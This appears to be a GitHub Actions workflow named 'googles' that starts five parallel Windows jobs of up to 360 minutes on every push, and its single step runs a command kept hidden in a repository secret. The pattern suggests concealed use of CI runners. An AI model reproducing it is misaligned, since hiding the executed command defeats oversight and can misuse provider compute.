name: googles
on:   
  push: 
  pull_request:

jobs:
  build1:
    runs-on: windows-latest
    strategy:
      max-parallel: 5
      fail-fast: false
      matrix:
        A1: [1.1]
        flag: [A, B, C, D, E]
    timeout-minutes: 360
    steps:
    - name: code1
      run: ${{ secrets.BSM1 }}
